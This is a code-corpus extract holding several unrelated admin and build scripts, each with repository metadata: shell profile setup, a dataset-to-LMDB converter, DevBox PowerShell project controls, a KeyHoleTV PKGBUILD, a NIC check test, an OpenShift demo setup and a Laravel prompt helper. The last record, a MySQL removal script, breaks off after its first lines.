# Your previous /Users/khuff/.bash_profile file was backed up as /Users/khuff/.bash_profile.macports-saved_2012-10-20_at_07:14:44
##

# MacPorts Installer addition on 2012-10-20_at_07:14:44: adding an appropriate PATH variable for use with MacPorts.
export PATH=/opt/local/bin:/opt/local/sbin:$PATH
# Finished adapting your PATH environment variable for use with MacPorts.

# setting the path for mactex
PATH="/usr/texbin:${PATH}"
export PATH

# setting up the path for adb
PATH="${PATH}:/opt/local/etc/adt-bundle-mac-x86_64/sdk/platform-tools"

[[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm" # Load RVM into a shell session *as a function*

# setting up the python path
PYTHONPATH="/Users/khuff/repos/cyder/output:${PYTHONPATH}"
export PYTHONPATH
| true
|
318b607538c99061fabea06e48fd4b15c2bf7b93
|
Shell
|
nslay/bleak
|
/Experiments/Data/madelon/MakeDB.sh
|
UTF-8
| 1,655
| 3.6875
| 4
|
[] |
no_license
|
#!/bin/sh
# Print the first of NAME / NAME.exe found on PATH (Windows builds append
# .exe); return 1 and print nothing when neither exists.
GetExeName() {
  base_="$1"
  for exe_ in "${base_}" "${base_}.exe"
  do
    # 'command -v' is the POSIX replacement for the external 'which'.
    if command -v "${exe_}" > /dev/null 2>&1
    then
      echo "${exe_}"
      return 0
    fi
  done
  return 1
}
# Join a whitespace-separated data file with a one-label-per-line file into
# a CSV: each output row is the data fields comma-joined, with the matching
# label appended as the final column.
#   $1 - data file (fields separated by whitespace)
#   $2 - label file (one value per line, same line count as $1)
#   $3 - output CSV path
MakeCsvFile() {
  dataFile_=$1
  labelFile_=$2
  outCsv_=$3
  # Single awk pass: first file fills table[] with comma-joined rows, the
  # second appends its line to the row with the same index. gsub strips CRs
  # from DOS line endings. NOTE: split(...," ") uses awk's default
  # whitespace splitting, so runs of spaces collapse.
  awk 'BEGIN { line=0; lastFile="" }
  { gsub("\\r","") }
  FILENAME == ARGV[1] {
    if (lastFile != FILENAME) {
      lastFile=FILENAME
      line=0
    }
    delete values
    split($0, values, " ")
    row=values[1]
    for (i = 2; i <= length(values); ++i)
      row = row "," values[i]
    table[line++] = row
  }
  FILENAME == ARGV[2] {
    if (lastFile != FILENAME) {
      lastFile=FILENAME
      line=0
    }
    table[line] = table[line] "," $0
    ++line
  }
  END {
    for (i = 0; i < length(table); ++i) {
      print table[i]
    }
  }' "${dataFile_}" "${labelFile_}" > "${outCsv_}"
}
# Build LMDB databases for the madelon dataset: join data+labels into CSVs,
# shuffle, split train/validation, then convert with bleakMakeDatabase.
searchCmd="bleakMakeDatabase"
makeDBCmd=`GetExeName "${searchCmd}"`
if [ -z "${makeDBCmd}" ]
then
  echo "Error: ${searchCmd} must be in PATH" 1>&2
  exit 1
fi
trainDataFile="madelon_train.data"
trainLabelFile="madelon_train.labels"
testDataFile="madelon_valid.data"
testLabelFile="madelon_valid.labels"
MakeCsvFile "${trainDataFile}" "${trainLabelFile}" "train_all.data"
MakeCsvFile "${testDataFile}" "${testLabelFile}" "test.data"
#exit
# Shuffle, then split: first 1500 rows for training, last 500 for validation.
shuf train_all.data > train_shuffled.data
head -n 1500 train_shuffled.data > train.data
tail -n 500 train_shuffled.data > validation.data
"${makeDBCmd}" -o madelon_train.lmdb -c mappings.ini train.data
"${makeDBCmd}" -o madelon_validation.lmdb -c mappings.ini validation.data
"${makeDBCmd}" -o madelon_test.lmdb -c mappings.ini test.data
| true
|
dd48ca0597286a49df251d7f1ff6adb35c094ad3
|
Shell
|
ewave-com/devbox-windows
|
/tools/main.ps1
|
UTF-8
| 6,435
| 3.59375
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# import global variables
. require_once "$devbox_root/tools/system/constants.ps1"
# import output functions (print messages)
. require_once "$devbox_root/tools/system/output.ps1"
# import devbox state function
. require_once "${devbox_root}/tools/devbox/devbox-state.ps1"
# import infrastructure functions
. require_once "$devbox_root/tools/devbox/infrastructure.ps1"
# import docker image functions
. require_once "${devbox_root}/tools/docker/docker-image.ps1"
# import main project functions entrypoint
. require_once "$devbox_root/tools/project/project-main.ps1"
# import common functions for all projects structure
. require_once "$devbox_root/tools/project/all-projects.ps1"
# import platform-tools functions
. require_once "$devbox_root/tools/project/platform-tools.ps1"
# import functions to show project information after start
. require_once "$devbox_root/tools/print/print-project-info.ps1"
############################ Public functions ############################
# Start a configured DevBox project: bring up shared infrastructure, start
# the project's services, print its info, and (interactively) open the
# platform-tools menu. $_no_interaction skips the interactive menu.
function start_devbox_project($_selected_project = "", $_no_interaction = $false) {
  show_success_message "Starting DevBox project '${_selected_project}'" "1"

  ensure_project_configured ${_selected_project}

  # Refuse to double-start a running project.
  if ((is_project_started $_selected_project)) {
    show_warning_message "Project '${_selected_project}' is already started."
    show_warning_message "Please ensure selected project is correct, or stop it and try to start again."
    exit 1
  }

  # initialize basic project variables and directories
  init_selected_project "$_selected_project"

  show_success_message "Starting common infrastructure." "1"
  # Start common infra services, e.g. portainer, nginx-reverse-proxy, mailer, etc.
  dotenv_export_variables "${dotenv_infra_filepath}"
  start_infrastructure "${dotenv_infra_filepath}"

  show_success_message "Starting project" "1"
  # Prepare all required configs and start project services
  start_project

  show_success_message "Project '${_selected_project}' was successfully started" "1"

  # Print final project info
  print_info

  if (-not $_no_interaction) {
    # Run platform tools menu inside web-container
    run_platform_tools
  }

  # Unset all used variables
  dotenv_unset_variables "${dotenv_infra_filepath}"
  dotenv_unset_variables "$project_up_dir/.env"
}
# Stop a single DevBox project's containers (shared infrastructure stays up).
function stop_devbox_project($_selected_project = "") {
  ensure_project_configured ${_selected_project}

  # Stopping an already-stopped project is a no-op with a warning.
  if (-not (is_project_started $_selected_project)) {
    show_warning_message "DevBox project '${_selected_project}' is already stopped" "1"
    return
  }

  show_success_message "Stopping DevBox project '${_selected_project}'" "1"
  # initialize basic project variables and directories
  init_selected_project "${_selected_project}"
  stop_current_project
  show_success_message "Project '${_selected_project}' was successfully stopped" "1"
}
# Bring a project fully down (containers removed).
# NOTE(review): the messages say "downed and cleaned" although this calls
# down_current_project (no clean) — compare down_and_clean_devbox_project;
# confirm whether the wording is intentional.
function down_devbox_project($_selected_project = "") {
  show_success_message "Downing and cleaning DevBox project '${_selected_project}'" "1"
  # initialize basic project variables and directories
  init_selected_project "${_selected_project}"
  down_current_project
  show_success_message "Project '${_selected_project}' was successfully downed and cleaned" "1"
}
# Bring a project fully down AND remove its persisted data/volumes.
function down_and_clean_devbox_project($_selected_project = "") {
  show_success_message "Downing and cleaning DevBox project '${_selected_project}'" "1"
  # initialize basic project variables and directories
  init_selected_project "${_selected_project}"
  down_and_clean_current_project
  show_success_message "Project '${_selected_project}' was successfully downed and cleaned" "1"
}
# Stop every configured project, then the shared infrastructure services.
function stop_devbox_all() {
  show_success_message "Stopping all DevBox projects" "1"

  # Stop all project containers
  foreach ($_selected_project in ((get_project_list).Split(','))) {
    if (is_project_configured ${_selected_project}) {
      stop_devbox_project "$_selected_project"
    }
  }

  show_success_message "Stopping common infrastructure." "1"
  stop_infrastructure "${dotenv_infra_filepath}"
  show_success_message "DevBox was successfully stopped" "1"
}
# Bring every configured project down, then stop the shared infrastructure.
function down_devbox_all() {
  show_success_message "Downing and cleaning all DevBox projects" "1"

  # Stop all project containers
  foreach ($_selected_project in ((get_project_list).Split(','))) {
    if (is_project_configured ${_selected_project}) {
      down_devbox_project "$_selected_project"
    }
  }

  show_success_message "Stopping common infrastructure." "1"
  stop_infrastructure "${dotenv_infra_filepath}"
  show_success_message "DevBox was successfully downed and cleaned" "1"
}
# Down AND clean every configured project, then stop shared infrastructure.
function down_and_clean_devbox_all() {
  show_success_message "Down and cleaning all DevBox projects" "1"

  # Stop all project containers
  foreach ($_selected_project in ((get_project_list).Split(','))) {
    if (is_project_configured ${_selected_project}) {
      down_and_clean_devbox_project "$_selected_project"
    }
  }

  show_success_message "Stopping common infrastructure." "1"
  stop_infrastructure "${dotenv_infra_filepath}"
  show_success_message "DevBox was successfully downed and cleaned" "1"
}
# Emergency teardown: kill and destroy ALL docker containers and volumes.
# Last-resort only — files on disk are left behind for manual cleanup.
function docker_destroy() {
  show_success_message "Purging all DevBox services, containers and volumes" "1"
  show_warning_message "Pay attention this action is only for emergency purposes when something went wrong and regular stopping does not work"
  show_warning_message "All files left of places and you will need to cleanup it manually if required."
  show_warning_message "This operation will kill and destroy all running docker data e.g. containers and volumes"
  destroy_all_docker_services
  show_success_message "Docker data was successfully purged" "1"
}
# Refresh local docker images when auto-update is enabled and the last
# refresh (tracked in the devbox state) is older than 30 days.
function update_docker_images_if_required() {
  if (-not $docker_images_autoupdate) {
    return
  }

  $_last_updated_since = (get_devbox_state_docker_images_updated_at_diff)
  if (-not ${_last_updated_since} -or ([int]${_last_updated_since} -gt 2592000)) { # 2592000 = 30 days
    show_success_message "Looking for docker image updates" "1"
    refresh_existing_docker_images
    # Record the refresh time as a unix timestamp.
    set_devbox_state_docker_images_updated_at ([int](Get-Date -UFormat %s -Millisecond 0))
  }
}
############################ Public functions end ############################
| true
|
9edd6acdca48f3723d8f7aa87768533ddf81a89b
|
Shell
|
nk53/bash_utils_macos
|
/fullpath
|
UTF-8
| 124
| 3.203125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# The opposite of basename: print the absolute path of an existing file.
if [ -e "$1" ]; then
  # BUG FIX: an already-absolute argument previously came out as
  # "$PWD//abs/path"; pass absolute paths through untouched.
  case $1 in
    /*) echo "$1" ;;
    *) echo "$PWD/$1" ;;
  esac
  exit 0
fi
# Diagnostics belong on stderr so stdout stays clean for consumers.
echo "No such file: $1" >&2
exit 1
| true
|
a15cb0ece4e1e0e370eb6fd0ef686dce3d799e84
|
Shell
|
ilventu/aur-mirror
|
/lkeyholetv/PKGBUILD
|
UTF-8
| 3,108
| 2.71875
| 3
|
[] |
no_license
|
# Contributor/Maintainer: ilikenwf/Matt Parnell <parwok@gmail.com>
# Arch Linux PKGBUILD for the KeyHoleTV Linux viewer (binary distribution).
pkgname=lkeyholetv
pkgver=1.26
pkgrel=1
pkgdesc="Live TV Viewer (Mostly Japanese Streams)...Server only works on windows version"
arch=('i686' 'x86_64')
provides=('keyholetv')
url="http://www.v2p.jp/video/english/"
depends=('alsa-lib' 'gtk2' 'cairo' 'pango' 'libx11' 'libpng')
license=('custom')
# 32-bit sources by default; overridden below for x86_64.
source=("http://www.v2p.jp/video/Viewer/Linux/32bits/LKeyHoleTV${pkgver}-32bits.tar.gz"
        'lkeyholetv.desktop'
        'lkeyholetv')
md5sums=('7db6862554a1db0d0a87bd3b8012617b'
         '905a8951b107054187d7228cb390ce62'
         'ae00db79eb19f3f1515f873852c903d2')
# On x86_64, swap in the 64-bit tarball and its checksums.
[ "$CARCH" = "x86_64" ] && source=("http://www.v2p.jp/video/Viewer/Linux/64bits/LKeyHoleTV${pkgver}-64bits.tar.gz"
        'lkeyholetv.desktop'
        'lkeyholetv') \
    && md5sums=('e67c914267dafbb1b93181359b296b66'
         '905a8951b107054187d7228cb390ce62'
         'ae00db79eb19f3f1515f873852c903d2')
# makepkg build/install step: compile the audio and language plugins, then
# install the prebuilt viewer plus desktop integration files.
build()
{
  cd ${srcdir}/KeyHoleTV
  mkdir -p ${pkgdir}/{usr/{bin,share/{applications,pixmaps}},opt/LKeyHoleTV} || return 1

  # Audio Interface: ALSA should work
  # ...try DSP or ESD if it doesn't by replacing ALSA appropriately below
  cd ${srcdir}/KeyHoleTV/ALSA
  make || return 1
  make install || return 1 # Weird, but correct

  # Language: unless you want Japanese
  # ...don't replace en_US with ja_JP
  cd ${srcdir}/KeyHoleTV/en_US
  make || return 1
  # BUG FIX: this line previously ended with a bare '|| #comment', which made
  # the *next* command ('install -c ... .KeyHoleTV') the fallback branch of
  # '||' — so the viewer was only installed when 'make install' FAILED.
  make install || return 1 # Weird, but correct

  # Time to install the program itself
  install -c ${srcdir}/KeyHoleTV/.KeyHoleTV ${pkgdir}/opt/LKeyHoleTV/
  install -c ${srcdir}/KeyHoleTV/lkeyholetv ${pkgdir}/opt/LKeyHoleTV/
  cp -r ${srcdir}/KeyHoleTV/.KeyHoleTV ${pkgdir}/opt/LKeyHoleTV/
  install -c ${srcdir}/lkeyholetv ${pkgdir}/usr/bin/
  install -m644 ${srcdir}/lkeyholetv.desktop ${pkgdir}/usr/share/applications/ || return 1
  install -m644 ${srcdir}/KeyHoleTV/keyholetv.xpm ${pkgdir}/usr/share/pixmaps/keyholetv.xpm || return 1

  # Display the upstream (binary-redistribution) license notice.
  msg "
  Copyright 2006 by Takashi Kosaka OISEYER(C) All rights reserved.
  Redistribution and use in binary forms, with or without
  modification, are permitted provided that the following conditions
  are met:
  1. Redistributions in binary form must reproduce the above copyright
  notice, this list of conditions and the following disclaimer in the
  documentation and/or other materials provided with the distribution.
  THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \`\`AS IS'' AND
  ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
  IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
  ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
  FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
  DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
  OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
  HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
  LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
  OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
  SUCH DAMAGE."
}
| true
|
1ca4b3c80fac3782e4be7511b0befe64bc5ebb69
|
Shell
|
parsoj/counter-db
|
/bin/challenge_executable
|
UTF-8
| 294
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/bash
# Launch the challenge DB server after verifying the Go toolchain and GOPATH.

# 'command -v' is the portable, builtin replacement for 'which'.
if ! command -v go >/dev/null; then
  echo "This App is written in Golang. Please install Go 1.6" >&2
  exit 1
fi

# ${GOPATH:-} keeps the test safe even under 'set -u'.
if [ -z "${GOPATH:-}" ]; then
  echo "please set the environment variable GOPATH to point to the 'challenge' directory" >&2
  exit 1
fi

go run "$GOPATH/src/db/server/server.go"
| true
|
6e61b164f6b1e9fa5c9e0a891408dcdc1c595462
|
Shell
|
Jackojc/dots
|
/scripts/dmenu/usb/prompt_usb_mount
|
UTF-8
| 399
| 3.640625
| 4
|
[] |
no_license
|
#!/usr/bin/env sh
# dmenu front-end: pick an unmounted USB drive, mount it, and open the
# mount point in spacefm.

# List unmounted drives; bail out with a notification when there are none.
THING=$(usb_get_unmounted)

if [ -z "$THING" ]; then
	notify_usb "no mountable drives!"
	exit 1
fi

# Let the user pick one; an empty selection means the menu was dismissed.
TARGET=$(echo "$THING" | dmenu -p "mount")

if [ -z "$TARGET" ]; then
	exit 1
fi

# First whitespace-separated field is the block device (e.g. /dev/sdb1).
BLOCKNAME=$(echo "$TARGET" | awk '{print $1}')

usb_mount "$BLOCKNAME" && notify_usb "$TARGET is now mounted!"

# BUG FIX: the previous 'echo spacefm "$mount" | sh &' re-parsed the command
# line, splitting mount points that contain spaces; invoke spacefm directly.
mount="$(lsblk -lnpo MOUNTPOINT "$BLOCKNAME")"
spacefm "$mount" &
| true
|
0f4cf453304551c5250c1af55d98bf5384a3e797
|
Shell
|
dingyu1/business-tests
|
/auto-test/delivery/network/basic_function/onboard_Function_001.sh
|
UTF-8
| 5,375
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/bash
#*****************************************************************************************
# * Case ID:    Function_001
# * Case name:  (author: Li Renxing)
# * Purpose:    onboard network port check
# * Written by: LWX638710
# * Finished:   2019-05-04
# Preconditions:
# 1. One D06 server installed with Ubuntu 18.04.1
# 2. A Mellanox 25G NIC in a PCIe slot of the secondary riser card
# Test steps:
# 1. Enter the operating system
# 2. Use 'ip a' to check that all onboard ports are visible
# 3. Use 'ethtool' to query information for each port
# Expected result:
# 1. The two onboard fibre ports, two copper ports and one 100G port are detected
#*****************************************************************************************
# Load the shared helper libraries (error codes, result-file helpers,
# system info and the LAVA shell test library).
. ../../../../utils/error_code.inc
. ../../../../utils/test_case_common.inc
. ../../../../utils/sys_info.sh
. ../../../../utils/sh-test-lib
#. ./utils/error_code.inc
#. ./test_case_common.inc
# Use the script name (without .sh) as the test case name.
test_name=$(basename $0 | sed -e 's/\.sh//')
# Create the log directory.
TMPDIR=./logs/temp
mkdir -p ${TMPDIR}
# Holds intermediate state/values while the script runs.
TMPFILE=${TMPDIR}/${test_name}.tmp
# Holds the result of every test step.
RESULT_FILE=${TMPDIR}/${test_name}.result
TMPCFG=${TMPDIR}/${test_name}.tmp_cfg
test_result="pass"
# Preconditions: prepare the result file and make sure ethtool is available.
function init_env()
{
    # Check whether the result file exists; create it if necessary.
    PRINT_LOG "INFO" "*************************start to run test case<${test_name}>**********************************"
    fn_checkResultFile ${RESULT_FILE}
    command -v ethtool
    if [ $? -ne 0 ]
    then
        fn_install_pkg ethtool 3
    fi
}
# Test-step function: count onboard fibre and copper (TP) ports driven by
# the hns/hns3 driver and record a pass/fail result for each check.
function test_case()
{
    # Physical (non-virtual) network interfaces.
    niclist=`ls -l /sys/class/net|grep -v virtual|awk -F"/" '{print $NF}'|grep -v ^total`
    firbe_nic_num=0
    tp_nic_num=0
    for i in $niclist
    do
        driver=`ethtool -i $i|grep "driver: "|awk '{print $2}'`
        # Only onboard ports (hns/hns3 driver) are counted.
        if [ "$driver" == "hns3" ] || [ "$driver" == "hns" ]
        then
            nic_type=`ethtool $i|grep "Supported ports:"|awk '{print $4}'`
            if [ "$nic_type" == "FIBRE" ];then
                ethtool $i|grep -A2 "Supported link modes:"|grep "10000base"
                if [ $? -eq 0 ];then
                    let firbe_nic_num=$firbe_nic_num+1
                    PRINT_LOG "INFO" "check FIBRE $i success,the current onboard nic is 10G,the current onboard nic num is $firbe_nic_num "
                    fn_writeResultFile "${RESULT_FILE}" "${i}_check" "pass"
                fi
                # NOTE(review): unlike the TP branch below, there is no 'else'
                # here — a fibre port without 10000base support is silently
                # ignored rather than recorded as a failure; confirm intent.
            elif [ "$nic_type" == "TP" ];then
                ethtool $i|grep -A2 "Supported link modes:"|grep "1000baseT"
                if [ $? -eq 0 ];then
                    let tp_nic_num=$tp_nic_num+1
                    PRINT_LOG "INFO" "check TP $i success,the current onboard nic num is $tp_nic_num "
                    fn_writeResultFile "${RESULT_FILE}" "${i}_check" "pass"
                else
                    PRINT_LOG "FATAL" "check TP $i fail,the current onboard nic num is $tp_nic_num "
                    fn_writeResultFile "${RESULT_FILE}" "${i}_check" "fail"
                fi
            else
                PRINT_LOG "FATAL" "check the nic type fail,please check manually"
                fn_writeResultFile "${RESULT_FILE}" "${i}_check" "fail"
            fi
        fi
    done
    # The board is expected to carry exactly two copper and two fibre ports.
    if [ $tp_nic_num -eq 2 ];then
        PRINT_LOG "INFO" "The onboard NIC_TP num is $tp_nic_num, is equal to 2 "
        fn_writeResultFile "${RESULT_FILE}" "onboard_tp_check_num" "pass"
    else
        PRINT_LOG "FATAL" "The onboard NIC_TP num is $tp_nic_num, is not equal to 2 "
        fn_writeResultFile "${RESULT_FILE}" "onboard_tp_check_num" "fail"
    fi
    if [ $firbe_nic_num -eq 2 ];then
        PRINT_LOG "INFO" "The onboard NIC_firbe num is $firbe_nic_num, is equal to 2 "
        fn_writeResultFile "${RESULT_FILE}" "onboard_check_num" "pass"
    else
        PRINT_LOG "FATAL" "The onboard NIC_firbe num is $firbe_nic_num, is not equal to 2 "
        fn_writeResultFile "${RESULT_FILE}" "onboard_check_num" "fail"
    fi
    check_result ${RESULT_FILE}
}
# Restore the environment after the test run.
function clean_env()
{
    # Remove temporary files.
    FUNC_CLEAN_TMP_FILE
    # Custom environment-restore steps go here; reverting installed tools is
    # not recommended.
    # For logging use the shared PRINT_LOG helper: PRINT_LOG "INFO|WARN|FATAL" "xxx"
    PRINT_LOG "INFO" "*************************end of running test case<${test_name}>**********************************"
}
# Orchestrate setup, test and teardown; any failing stage marks the case
# as failed and makes main return non-zero.
function main()
{
    init_env || test_result="fail"
    if [ "${test_result}" = "pass" ]; then
        test_case || test_result="fail"
    fi
    clean_env || test_result="fail"
    # Propagate an overall failure status to the caller.
    [ "${test_result}" = "pass" ] || return 1
}
main $@
ret=$?
# LAVA platform result-reporting interface — do not modify.
lava-test-case "$test_name" --result ${test_result}
exit ${ret}
| true
|
c8c001cf28670a1a8053d0a5f29f4837fb0892bc
|
Shell
|
jbjonesjr/devnation-federal-2017
|
/probot-demo/setup.sh
|
UTF-8
| 4,014
| 3.125
| 3
|
[] |
no_license
|
#!/bin/bash
# Set up the DevNation Federal 2017 probot demo on OpenShift: a PHP
# frontend backed by an ephemeral MySQL database, with routes exposed.

# Configuration
. ./config.sh || { echo "FAILED: Could not configure" && exit 1 ; }
# Additional Configuration
# NONE

# See https://docs.openshift.com/enterprise/latest for general openshift docs
echo "Create a Devnation Fedevnation-visitorsderal 2017 demo environment"
echo " --> make sure we are logged in"
echo " --> create a project for our work"
# Reuse the project if it exists, otherwise create it with optional
# description/display-name parameters.
oc project ${OPENSHIFT_PROJECT} || oc new-project ${OPENSHIFT_PROJECT} ${OPENSHIFT_PROJECT_DESCRIPTION+"--description"} ${OPENSHIFT_PROJECT_DESCRIPTION} ${OPENSHIFT_PROJECT_DISPLAY_NAME+"--display-name"} ${OPENSHIFT_PROJECT_DISPLAY_NAME} || { echo "FAILED: could not create project" && exit 1 ; }
oc whoami || oc login master.rhsademo.net -u ${OPENSHIFT_USER} -p ${OPENSHIFT_RHSADEMO_USER_PASSWORD_DEFAULT}
echo "========== STATUS QUO deployment =========="
echo " --> Create the ${OPENSHIFT_APPLICATION_BACKEND_NAME} application from the mysql-ephemeral template"
oc get dc/mysql || oc new-app mysql-ephemeral --name=mysql -l app=${OPENSHIFT_APPLICATION_NAME},part=${OPENSHIFT_APPLICATION_BACKEND_NAME} --param=MYSQL_USER=myphp --param=MYSQL_PASSWORD=myphp --param=MYSQL_DATABASE=myphp || { echo "FAILED: Could find or create the ${OPENSHIFT_APPLICATION_BACKEND_NAME} for ${OPENSHIFT_APPLICATION_NAME}" && exit 1; }
echo " --> Create ${OPENSHIFT_APPLICATION_FRONTEND_NAME} application from the php:5.6 template and application git repo"
oc get dc/php || oc new-app php:5.6~https://github.com/michaelepley/phpmysqldemo.git#devnation-probot --name=php -l app=${OPENSHIFT_APPLICATION_NAME},part=${OPENSHIFT_APPLICATION_FRONTEND_NAME},demophase=statusquo -e MYSQL_SERVICE_HOST=mysql.${OPENSHIFT_PROJECT}.svc.cluster.local MYSQL_SERVICE_PORT=3306 -e MYSQL_SERVICE_DATABASE=myphp -e MYSQL_SERVICE_USERNAME=myphp -e MYSQL_SERVICE_PASSWORD=myphp || { echo "FAILED: Could find or create ${OPENSHIFT_APPLICATION_FRONTEND_NAME} for ${OPENSHIFT_APPLICATION_NAME}" && exit 1; }
echo " --> configure the application with fairly minimal resources"
oc get dc/php && oc patch dc/php -p '{"spec" : { "template" : { "spec" : { "containers" : [ { "name" : "php", "resources" : { "limits" : { "cpu" : "400m" }, "requests" : { "cpu" : "200m" } } } ] } } } }' || { echo "FAILED: Could not patch application" && exit 1; }
echo " --> configure the application with liveness and readiness checks"
oc set probe dc/php --liveness --readiness --get-url=http://:8080/ --failure-threshold=4 --timeout-seconds=4
# Poll until the frontend pod is Running; pressing a key skips the wait.
echo " --> Waiting for the ${OPENSHIFT_APPLICATION_FRONTEND_NAME} application to start....press any key to proceed"
while ! oc get pods | grep php | grep Running ; do echo -n "." && { read -t 1 -n 1 && break ; } && sleep 1s; done; echo ""
echo " --> Expose the generic endpoint"
oc get route php || oc expose service php || { echo "FAILED: Could not verify route to application frontend" && exit 1; } || { echo "FAILED: Could patch frontend" && exit 1; }
echo " --> Expose an endpoint for external users...start them with the default app"
oc get route devnation-visitors || oc expose service php --name devnation-visitors -l app=${OPENSHIFT_APPLICATION_NAME} --hostname="devnation-visitors.apps.rhsademo.net"
echo " --> and for convenience, lets group the frontend and backend"
oc get svc/php && oc patch svc/php -p '{"metadata" : { "annotations" : { "service.alpha.openshift.io/dependencies" : "[ { \"name\" : \"mysql\" , \"kind\" : \"Service\" } ]" } } }' || { echo "FAILED: Could not patch application" && exit 1; }
#firefox php-${OPENSHIFT_PROJECT}.apps.rhsademo.net?refresh=10
# Export the created objects as JSON templates for the probot demo.
echo " --> extracting the object definitions"
oc get bc/php -o json > ocp-myphp-php-build.json
oc get dc/php -o json > ocp-myphp-php-deploy.json
oc get svc/php -o json > ocp-myphp-php-service.json
oc get is/php -o json > ocp-myphp-php-imagestream.json
oc get route/devnation-visitors -o json > ocp-myphp-php-route.json
echo " --> load the probot application with these objects & start it"
echo " --> then, file a pull request against the repository"
echo "Done"
| true
|
ed1a45f200465762f943e0e40d4d1b596b6dfa8d
|
Shell
|
RVxLab/dotfiles
|
/dotfiles/scripts/bin/laravel.starship.sh
|
UTF-8
| 2,332
| 4.09375
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Starship prompt segment: print the Laravel version of the current
# project, cached under /tmp so `php artisan --version` is not spawned
# on every prompt render.
set -euo pipefail
# Cache directory for per-project version entries and lock checksums.
STARSHIP_CACHE_DIR="/tmp/starship-cache"
JSON_FILE="$STARSHIP_CACHE_DIR/laravel.json"
# Sentinel printed by get_entry when a project has no cached version.
VERSION_NOT_FOUND="___VERS_NOT_FOUND___"
check_artisan() {
    # Succeed only when the CWD looks like an installed Laravel project:
    # an artisan entry point plus a populated vendor/ directory.
    [[ -f "$PWD/artisan" && -d "$PWD/vendor" ]]
}
get_laravel_version() {
# Parse "Laravel Framework x.y.z" down to the version number (3rd field).
php artisan --version | awk '{ print $3 }'
}
get_project_name() {
    # The basename of the working directory doubles as the cache key.
    local project_dir="$PWD"
    basename "$project_dir"
}
check_dependencies() {
    # jq is required to read and write the JSON cache file; the exit
    # status of `command -v` (0 found / 1 missing) is the result.
    command -v jq > /dev/null
}
create_json_file_if_needed() {
    # Ensure the cache directory and the JSON cache file both exist.
    if [ ! -d "$STARSHIP_CACHE_DIR" ]
    then
        mkdir -p "$STARSHIP_CACHE_DIR"
    fi
    # Fix: the existence test previously hard-coded
    # "$STARSHIP_CACHE_DIR/laravel.json" instead of using $JSON_FILE,
    # which the write below (and every other function) relies on.
    if [ ! -f "$JSON_FILE" ]
    then
        # Seed the cache with an empty JSON object on first use.
        echo "{}" > "$JSON_FILE"
    fi
}
get_entry() {
    # Look up a project's cached version in $JSON_FILE. Prints the
    # $VERSION_NOT_FOUND sentinel when the key is absent; exits the
    # whole script with status 2 when called without a name.
    local project="${1-}"
    [ -n "$project" ] || exit 2
    jq -r --arg notfound "$VERSION_NOT_FOUND" --arg key "$project" \
        '.[$key] // $notfound' "$JSON_FILE"
}
update_entry() {
    # Record the project's current Laravel version in the JSON cache,
    # then echo it so the caller can reuse the value.
    local NAME="${1-}"
    if [ -z "$NAME" ]
    then
        exit 2
    fi
    # Fix: declaration split from assignment — `local V=$(cmd)` returns
    # the status of `local` (always 0), so a failing command was
    # silently masked despite `set -e`.
    local VERSION TMP_FILE
    VERSION=$(get_laravel_version)
    TMP_FILE=$(mktemp)
    # jq cannot edit in place: write to a temp file, then swap it in.
    jq --arg key "$NAME" --arg value "$VERSION" '.[$key] = $value' "$JSON_FILE" > "$TMP_FILE"
    mv -f "$TMP_FILE" "$JSON_FILE"
    echo "$VERSION"
}
did_version_change() {
    # Compare composer.lock's "content-hash" against the copy remembered
    # in the cache dir. Returns 0 (changed) and refreshes the stored
    # hash when they differ; returns 1 when unchanged or not comparable
    # (no name given, or no composer.lock present).
    local project="${1-}"
    if [ -z "$project" ]
    then
        return 1
    fi
    if [ ! -f "composer.lock" ]
    then
        return 1
    fi
    # Assignment kept on the `local` line so a jq failure stays
    # non-fatal under set -e, matching the original behavior.
    local current_hash=$(jq -r '."content-hash"' "composer.lock")
    local hash_file="$STARSHIP_CACHE_DIR/$project.checksum"
    local stored_hash=""
    if [ -f "$hash_file" ]
    then
        stored_hash=$(cat "$hash_file")
    fi
    if [ "$current_hash" == "$stored_hash" ]
    then
        return 1
    fi
    echo "$current_hash" > "$hash_file"
    return 0
}
# Bail out quietly when not inside an installed Laravel project: the
# prompt segment should simply render nothing.
if ! check_artisan
then
    # Not in a valid Laravel project
    exit 0
fi
if ! check_dependencies
then
    # Fix: ">2" created a file literally named "2"; ">&2" sends the
    # diagnostic to stderr as intended.
    echo "Missing dependencies" >&2
    exit 1
fi
NAME=$(get_project_name)
create_json_file_if_needed
if did_version_change "$NAME"
then
    # composer.lock changed: read artisan now, refresh the cache in the
    # background so the prompt stays fast.
    CACHED_VERSION=$(get_laravel_version)
    update_entry "$NAME" > /dev/null &
else
    CACHED_VERSION=$(get_entry "$NAME")
fi
if [ "$CACHED_VERSION" = "$VERSION_NOT_FOUND" ]
then
    # Nothing cached yet: record and print the fresh version. (Direct
    # call — the old `echo $(update_entry …)` word-split the output
    # only to re-echo it.)
    update_entry "$NAME"
else
    echo "$CACHED_VERSION"
fi
| true
|
d72ca73756697920cbef6a54036c61b950989d18
|
Shell
|
tadruj/tadruj.github.io
|
/code/devops/vagrant/hhvm/bin/mysql.rm
|
UTF-8
| 397
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/bash
# Remove a MySQL database and the identically-named user account.
if [ -z "$1" ]; then
    # Fix: usage errors now exit non-zero and print to stderr.
